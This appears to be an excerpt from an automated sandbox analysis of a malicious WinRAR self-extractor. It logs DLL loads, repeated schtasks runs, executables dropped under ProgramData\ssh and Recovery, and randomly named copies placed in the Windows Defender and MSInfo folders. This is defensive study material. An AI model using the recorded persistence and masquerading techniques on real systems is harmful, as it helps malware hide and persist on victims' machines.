              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: profapi.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: amsi.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: userenv.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: edputil.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: netutils.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: slc.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: sppc.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: version.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: netfxperf.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Recovery\Idle.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Recovery\Idle.exeSection loaded: mscoree.dll
              Source: C:\Recovery\Idle.exeSection loaded: kernel.appcore.dll
              Source: C:\Recovery\Idle.exeSection loaded: version.dll
              Source: C:\Recovery\Idle.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Recovery\Idle.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Recovery\Idle.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Recovery\Idle.exeSection loaded: uxtheme.dll
              Source: C:\Recovery\Idle.exeSection loaded: windows.storage.dll
              Source: C:\Recovery\Idle.exeSection loaded: wldp.dll
              Source: C:\Recovery\Idle.exeSection loaded: profapi.dll
              Source: C:\Recovery\Idle.exeSection loaded: cryptsp.dll
              Source: C:\Recovery\Idle.exeSection loaded: rsaenh.dll
              Source: C:\Recovery\Idle.exeSection loaded: cryptbase.dll
              Source: C:\Recovery\Idle.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: mscoree.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: apphelp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: version.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: windows.storage.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: wldp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: profapi.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: cryptsp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: rsaenh.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: mscoree.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: version.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: windows.storage.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: wldp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: profapi.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: cryptsp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: rsaenh.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\bc31d5a79a9161Jump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeDirectory created: C:\Program Files\Windows Defender\bc31d5a79a9161Jump to behavior
              Source: 6uPVRnocVS.exeStatic file information: File size 2180702 > 1048576
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 6uPVRnocVS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: 6uPVRnocVS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 6uPVRnocVS.exe
              Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: 6uPVRnocVS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 6uPVRnocVS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 6uPVRnocVS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 6uPVRnocVS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 6uPVRnocVS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile created: C:\ProgramData\ssh\__tmp_rar_sfx_access_check_4245062Jump to behavior
              Source: 6uPVRnocVS.exeStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010E28C push eax; ret 0_2_0010E2AA
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010CAC9 push eax; retf 0010h0_2_0010CACE
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010ED46 push ecx; ret 0_2_0010ED59
              Source: C:\ProgramData\ssh\System.exeCode function: 4_2_00007FFD9BAB2C8D pushad ; retf 4_2_00007FFD9BAB2CC1
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA9C720 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA2B08 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BAA2A59 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA92C98 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA92CB8 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA92CA8 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exeCode function: 33_2_00007FFD9BAC2BDD pushfd ; iretd 33_2_00007FFD9BAC2BE2
              Source: C:\Recovery\Idle.exeCode function: 33_2_00007FFD9BAB2C8D pushad ; retf 33_2_00007FFD9BAB2CC1
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeCode function: 34_2_00007FFD9BAC2C8D pushad ; retf 34_2_00007FFD9BAC2CC1
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeCode function: 36_2_00007FFD9BAD2C8D pushad ; retf 36_2_00007FFD9BAD2CC1
              Source: System.exe.0.drStatic PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.drStatic PE information: section name: .text entropy: 7.45249791422668
